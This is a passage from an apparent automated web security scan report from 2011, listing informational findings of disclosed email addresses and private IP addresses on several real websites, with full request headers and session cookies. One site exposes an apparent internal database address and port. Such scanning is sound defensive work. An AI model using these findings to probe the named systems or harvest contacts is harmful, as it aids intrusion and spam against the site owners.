Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:21:53 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28866

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Distance Learning |
...[SNIP]...
<a href="mailto:info@hipaarx.net">
...[SNIP]...

24.52. http://www.hipaarx.net/contactus.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hipaarx.net
Path:   /contactus.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /contactus.php HTTP/1.1
Host: www.hipaarx.net
Proxy-Connection: keep-alive
Referer: http://www.hipaarx.net/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=20092065.1303780542.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=20092065.200382055.1303780542.1303780542.1303780542.1; __utmc=20092065; __utmb=20092065.1.10.1303780542

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:23:42 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 21083

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>HIPAA Solutions Rx -
...[SNIP]...
<a href="mailto:sales@hipaarx.net">sales@hipaarx.net</a>
...[SNIP]...
<a href="mailto:sales@hipaarx.net">partners@hipaarx.net</a>
...[SNIP]...
<a href="mailto:pr@hipaarx.net">pr@hipaarx.net</a>
...[SNIP]...
<a href="mailto:info@hipaarx.net">info@hipaarx.net</a>
...[SNIP]...
<a href="mailto:webmaster@hipaarx.net">webmaster@hipaarx.net </a>
...[SNIP]...
<a href="mailto:info@hipaarx.net">Info@hipaarx.net </a>
...[SNIP]...

24.53. http://www.hipaasecurityrx.net/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hipaasecurityrx.net
Path:   /

Issue detail

The following email addresses were disclosed in the response:

Request

GET / HTTP/1.1
Host: www.hipaasecurityrx.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:24:57 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.17
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22748

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>HIPAA Compliance for
...[SNIP]...
<a href="mailto:sales@bridgefront.com">info@bridgefront.com</a>
...[SNIP]...
<a href="mailto:info@bridgefront.com">
...[SNIP]...

24.54. http://www.is3.com/about/af-support-form.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.is3.com
Path:   /about/af-support-form.do

Issue detail

The following email address was disclosed in the response:

Request

GET /about/af-support-form.do HTTP/1.1
Host: www.is3.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uz5dkgqlh1h3rh45ub1bxp2u; VisitorInfo=AffiliateID=9000&SubAffiliateID=&CampaignID=_UNDEFINED&HttpReferrer=_NO_REFERER&DateRecorded=4/26/2011 9:58:56 AM; __utmz=252437649.1303826349.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=252437649.419534079.1303826349.1303826349.1303826349.1; __utmc=252437649; __utmb=252437649.5.10.1303826349

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Apr 2011 13:59:16 GMT
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 13:59:16 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa OUR BUS COM NAV", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 37735


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="ctl00_ctl00_Head1">
   
<!-- BEGIN RESOURCE: is3_site\content\html_head_main
...[SNIP]...
odyContents_formContents_SupportForm_MyBasicInfo_SubmitEmail";
ctl00_ctl00_bodyContents_formContents_SupportForm_MyBasicInfo_SubmitEmailFormatValidator.errormessage = "- Make sure the email is valid (eg.yourname@yourprovider.com)";
ctl00_ctl00_bodyContents_formContents_SupportForm_MyBasicInfo_SubmitEmailFormatValidator.display = "Dynamic";
ctl00_ctl00_bodyContents_formContents_SupportForm_MyBasicInfo_SubmitEmailFormatValida
...[SNIP]...
yContents_formContents_SupportForm_MyBasicInfo_ConfirmEmail";
ctl00_ctl00_bodyContents_formContents_SupportForm_MyBasicInfo_ConfirmEmailFormatValidator.errormessage = "- Make sure the email is valid (eg.yourname@yourprovider.com)";
ctl00_ctl00_bodyContents_formContents_SupportForm_MyBasicInfo_ConfirmEmailFormatValidator.display = "Dynamic";
ctl00_ctl00_bodyContents_formContents_SupportForm_MyBasicInfo_ConfirmEmailFormatVali
...[SNIP]...

24.55. http://www.is3.com/about/contactUs.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.is3.com
Path:   /about/contactUs.do

Issue detail

The following email addresses were disclosed in the response:

Request

GET /about/contactUs.do HTTP/1.1
Host: www.is3.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Apr 2011 13:58:56 GMT
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 13:58:56 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa OUR BUS COM NAV", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=vvivob45vz2sv1nc3pbgld55; path=/; HttpOnly
Set-Cookie: VisitorInfo=AffiliateID=9000&SubAffiliateID=&CampaignID=_UNDEFINED&HttpReferrer=_NO_REFERER&DateRecorded=4/26/2011 9:58:56 AM; domain=.is3.com; expires=Wed, 25-Apr-2012 13:58:56 GMT; path=/
Vary: Accept-Encoding
Content-Length: 22842


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="ctl00_ctl00_Head1">
   
<!-- BEGIN RESOURCE: is3_site\content\html_head_main
...[SNIP]...
<a href="http://www.is3.com/about/businessDevelopmentForm.do">BizDev@iS3.com</a>
...[SNIP]...
<a href="http://www.is3.com/about/corporateSalesForm.do">Sales@iS3.com</a>
...[SNIP]...
<a href="http://www.is3.com/about/customerSupportForm.do">TechSupport@iS3.com</a>
...[SNIP]...
<a href="http://www.is3.com/about/humanResourcesForm.do">HR@iS3.com</a>
...[SNIP]...
<a href="http://www.is3.com/about/marketingForm.do">Marketing@iS3.com</a>
...[SNIP]...
<a href="http://www.is3.com/about/mediaForm.do">Media@iS3.com</a>
...[SNIP]...

24.56. http://www.is3.com/products/antifraud/BizDev.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.is3.com
Path:   /products/antifraud/BizDev.do

Issue detail

The following email address was disclosed in the response:

Request

GET /products/antifraud/BizDev.do HTTP/1.1
Host: www.is3.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uz5dkgqlh1h3rh45ub1bxp2u; VisitorInfo=AffiliateID=9000&SubAffiliateID=&CampaignID=_UNDEFINED&HttpReferrer=_NO_REFERER&DateRecorded=4/26/2011 9:58:56 AM; __utmz=252437649.1303826349.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=252437649.419534079.1303826349.1303826349.1303826349.1; __utmc=252437649; __utmb=252437649.8.10.1303826349

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Apr 2011 13:59:22 GMT
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 13:59:22 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa OUR BUS COM NAV", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 39848


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="ctl00_ctl00_Head1">
   
<!-- BEGIN RESOURCE: is3_site\content\html_head_main
...[SNIP]...
_bodyContents_formContents_BusDevForm_MyBasicInfo_SubmitEmail";
ctl00_ctl00_bodyContents_formContents_BusDevForm_MyBasicInfo_SubmitEmailFormatValidator.errormessage = "- Make sure the email is valid (eg.yourname@yourprovider.com)";
ctl00_ctl00_bodyContents_formContents_BusDevForm_MyBasicInfo_SubmitEmailFormatValidator.display = "Dynamic";
ctl00_ctl00_bodyContents_formContents_BusDevForm_MyBasicInfo_SubmitEmailFormatValidato
...[SNIP]...
odyContents_formContents_BusDevForm_MyBasicInfo_ConfirmEmail";
ctl00_ctl00_bodyContents_formContents_BusDevForm_MyBasicInfo_ConfirmEmailFormatValidator.errormessage = "- Make sure the email is valid (eg.yourname@yourprovider.com)";
ctl00_ctl00_bodyContents_formContents_BusDevForm_MyBasicInfo_ConfirmEmailFormatValidator.display = "Dynamic";
ctl00_ctl00_bodyContents_formContents_BusDevForm_MyBasicInfo_ConfirmEmailFormatValida
...[SNIP]...

24.57. http://www.is3.com/products/antifraud/Bulk-Licensing.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.is3.com
Path:   /products/antifraud/Bulk-Licensing.do

Issue detail

The following email address was disclosed in the response:

Request

GET /products/antifraud/Bulk-Licensing.do HTTP/1.1
Host: www.is3.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uz5dkgqlh1h3rh45ub1bxp2u; VisitorInfo=AffiliateID=9000&SubAffiliateID=&CampaignID=_UNDEFINED&HttpReferrer=_NO_REFERER&DateRecorded=4/26/2011 9:58:56 AM; __utmz=252437649.1303826349.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=252437649.419534079.1303826349.1303826349.1303826349.1; __utmc=252437649; __utmb=252437649.7.10.1303826349

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Apr 2011 13:59:21 GMT
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 13:59:21 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa OUR BUS COM NAV", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 18629


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="ctl00_ctl00_Head1">
   
<!-- BEGIN RESOURCE: is3_site\content\html_head_main
...[SNIP]...
<a href="mailto:sales@stopzilla.com" class="link_green">
...[SNIP]...

24.58. http://www.is3.com/products/antifraud/Reseller.do  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.is3.com
Path:   /products/antifraud/Reseller.do

Issue detail

The following email address was disclosed in the response:

Request

GET /products/antifraud/Reseller.do HTTP/1.1
Host: www.is3.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=uz5dkgqlh1h3rh45ub1bxp2u; VisitorInfo=AffiliateID=9000&SubAffiliateID=&CampaignID=_UNDEFINED&HttpReferrer=_NO_REFERER&DateRecorded=4/26/2011 9:58:56 AM; __utmz=252437649.1303826349.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=252437649.419534079.1303826349.1303826349.1303826349.1; __utmc=252437649; __utmb=252437649.6.10.1303826349

Response

HTTP/1.1 200 OK
Cache-Control: private
Date: Tue, 26 Apr 2011 13:59:20 GMT
Content-Type: text/html; charset=utf-8
Expires: Tue, 26 Apr 2011 13:59:20 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI CURa ADMa DEVa OUR BUS COM NAV", policyref="/w3c/p3p.xml"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Vary: Accept-Encoding
Content-Length: 57957


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="ctl00_ctl00_Head1">
   
<!-- BEGIN RESOURCE: is3_site\content\html_head_main
...[SNIP]...
yContents_formContents_ResellerForm_MyBasicInfo_SubmitEmail";
ctl00_ctl00_bodyContents_formContents_ResellerForm_MyBasicInfo_SubmitEmailFormatValidator.errormessage = "- Make sure the email is valid (eg.yourname@yourprovider.com)";
ctl00_ctl00_bodyContents_formContents_ResellerForm_MyBasicInfo_SubmitEmailFormatValidator.display = "Dynamic";
ctl00_ctl00_bodyContents_formContents_ResellerForm_MyBasicInfo_SubmitEmailFormatVali
...[SNIP]...
ontents_formContents_ResellerForm_MyBasicInfo_ConfirmEmail";
ctl00_ctl00_bodyContents_formContents_ResellerForm_MyBasicInfo_ConfirmEmailFormatValidator.errormessage = "- Make sure the email is valid (eg.yourname@yourprovider.com)";
ctl00_ctl00_bodyContents_formContents_ResellerForm_MyBasicInfo_ConfirmEmailFormatValidator.display = "Dynamic";
ctl00_ctl00_bodyContents_formContents_ResellerForm_MyBasicInfo_ConfirmEmailFormatVa
...[SNIP]...

24.59. http://www.onestoppciscan.com/contact.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.onestoppciscan.com
Path:   /contact.html

Issue detail

The following email address was disclosed in the response:

Request

GET /contact.html HTTP/1.1
Host: www.onestoppciscan.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:53:30 GMT
Server: Apache
Last-Modified: Mon, 21 Mar 2011 13:42:49 GMT
ETag: "df8475-413a-49efe4dae6840"
Accept-Ranges: bytes
Content-Length: 16698
Content-Type: text/html

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
   <meta HTTP-EQUIV="REFRESH" content="0; url=http://www.backbonesecurity.com/interior.cfm?itemCategory=39808&siteid=418&pr
...[SNIP]...
<input type ="hidden" NAME="sendto" VALUE="jeff@aagg.com">
...[SNIP]...

24.60. http://www.saintcorporation.com/products/order.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.saintcorporation.com
Path:   /products/order.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /products/order.html HTTP/1.1
Host: www.saintcorporation.com
Proxy-Connection: keep-alive
Referer: http://www.saintcorporation.com/products/saas/webSaintPro.html?gclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=23724856.1303775066.1.1.utmgclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=23724856.513666181.1303775066.1303775066.1303775066.1; __utmc=23724856; __utmb=23724856.1.10.1303775066

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:57:34 GMT
Server: Apache/2.2.15 (Unix)
Accept-Ranges: bytes
Content-Length: 23589
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a href="mailto:sales@saintcorporation.com">sales@saintcorpoation.com</a>
...[SNIP]...
<a href="mailto:sales@saintcorporation.com">sales@saintcorpoation.com</a>
...[SNIP]...
<a href="mailto:sales@saintcorporation.com">sales@saintcorporation.com</a>
...[SNIP]...
<a href="mailto:sales@saintcorporation.com">sales@saintcorporation.com</a>
...[SNIP]...
<a href="mailto:sales@saintcorporation.com">sales@saintcorporation.com</a>
...[SNIP]...

24.61. https://www.saintcorporation.com/cgi-bin/shopcart/cartaction.pl  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.saintcorporation.com
Path:   /cgi-bin/shopcart/cartaction.pl

Issue detail

The following email address was disclosed in the response:

Request

POST /cgi-bin/shopcart/cartaction.pl HTTP/1.1
Host: www.saintcorporation.com
Connection: keep-alive
Referer: http://www.saintcorporation.com/cgi-bin/shopcart/cart.pl
Cache-Control: max-age=0
Origin: http://www.saintcorporation.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=23724856.1303775066.1.1.utmgclid=CKeR3cTsuKgCFUNd5Qod6WW7Cw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=23724856.513666181.1303775066.1303775066.1303775066.1; __utmc=23724856; __utmb=23724856.3.10.1303775066
Content-Length: 15

parts_cb=wsp50s

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:03:56 GMT
Server: Apache/2.2.15 (Unix)
Connection: close
Content-Type: text/html
Content-Length: 6496

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>shop c
...[SNIP]...
<a href="mailto:support@saintcorporation.com">support@saintcorporation.com</a>
...[SNIP]...

25. Private IP addresses disclosed  previous  next
There are 13 instances of this issue:


25.1. http://afreshbunch.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET / HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.6.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 38736
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:02:16 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:03:16 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
<script type="text/javascript">
   var _SGSV = {
       ai:'',
       pi:'A25478AA-97CD-4A2F-AB15-301619B3848F',
       mi:'NOMEMBER',
       si:'CB37911B-6349-45F9-8E60-626BA164D748',
       db:'172.16.1.9,1433',
       homeid:'A25478AA-97CD-4A2F-AB15-301619B3848F',
       
       chat:false
       
   };
   var _SKYAUTH = {
    loginUrl:'http://afreshbunch.com/?page=login',
    memberNick:'',
   
   
...[SNIP]...

25.2. http://afreshbunch.com/about.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /about.htm

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /about.htm HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://www.afreshbunch.com/?page=login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.5.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 23126
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:02:09 GMT
Server: Microsoft-IIS/7.0
Set-Cookie: site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; path=/
Set-Cookie: ASPSESSIONIDSSTDDTRS=ICCEHBADCBLIPHIBGONINFAE; path=/
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:03:09 GMT

<!DOCTYPE html>
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml">


<head>
<link href="/user/453756/theme/favicon.ico" rel="SHORTCUT ICON" />
<link rel="alternate" type="application/rs
...[SNIP]...
<script type="text/javascript">
   var _SGSV = {
       ai:'',
       pi:'06A9B4E8-AC33-4EFF-AADE-9CA73D66E390',
       mi:'NOMEMBER',
       si:'CB37911B-6349-45F9-8E60-626BA164D748',
       db:'172.16.1.9,1433',
       homeid:'A25478AA-97CD-4A2F-AB15-301619B3848F',
       
       chat:false
       
   };
   var _SKYAUTH = {
    loginUrl:'http://afreshbunch.com/?page=login',
    memberNick:'',
   
   
...[SNIP]...

25.3. http://afreshbunch.com/forums/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /forums/

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1 HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=214603079.1303778640.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); site=referring%5Fsite=http%3A%2F%2Fwww%2Eafreshbunch%2Ecom%2F%3Fpage%3Dlogin; ASPSESSIONIDSSTDDTRS=KCCEHBADJFMPMBJHMBPOOFIB; __utma=1.1546818399.1303779795.1303779795.1303779795.1; __utmb=1; __utmc=1; __utmz=1.1303779795.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utma=214603079.709171066.1303778640.1303778640.1303778640.1; __utmc=214603079; __utmb=214603079.7.10.1303778640

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Length: 14353
Content-Type: text/html
Expires: Tue, 26 Apr 2011 01:02:26 GMT
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 26 Apr 2011 01:03:26 GMT


<!DOCTYPE html>
<html>

<head>
<LINK REL="SHORTCUT ICON" HREF="/user/453756/theme/favicon.ico">
<META HTTP-EQUIV="Pragma" CONTENT="no-cache">
<META HTTP-EQUIV="Expires" CONTENT="-1">
<meta na
...[SNIP]...
<script type="text/javascript">
   var _SGSV = {
       ai:'',
       pi:'',
       mi:'NOMEMBER',
       si:'CB37911B-6349-45F9-8E60-626BA164D748',
       db:'172.16.1.9,1433',
       homeid:'A25478AA-97CD-4A2F-AB15-301619B3848F',
       
       chat:false
       
   };
   var _SKYAUTH = {
    loginUrl:'http://afreshbunch.com/?page=login',
    memberNick:'',
   

   
...[SNIP]...

25.4. http://afreshbunch.com/forums/images/x.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://afreshbunch.com
Path:   /forums/images/x.gif

Issue detail

The following RFC 1918 IP address was disclosed in the response:

Request

GET /forums/images/x.gif HTTP/1.1
Host: afreshbunch.com
Proxy-Connection: keep-alive
Referer: http://afreshbunch.com/forums/?page=post&id=A1068400-5C67-4276-A448-8E648C68CF74&fid=1E97BB3C-73BC-40AF-9065-B0C5EBC2FF2E&lastp=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
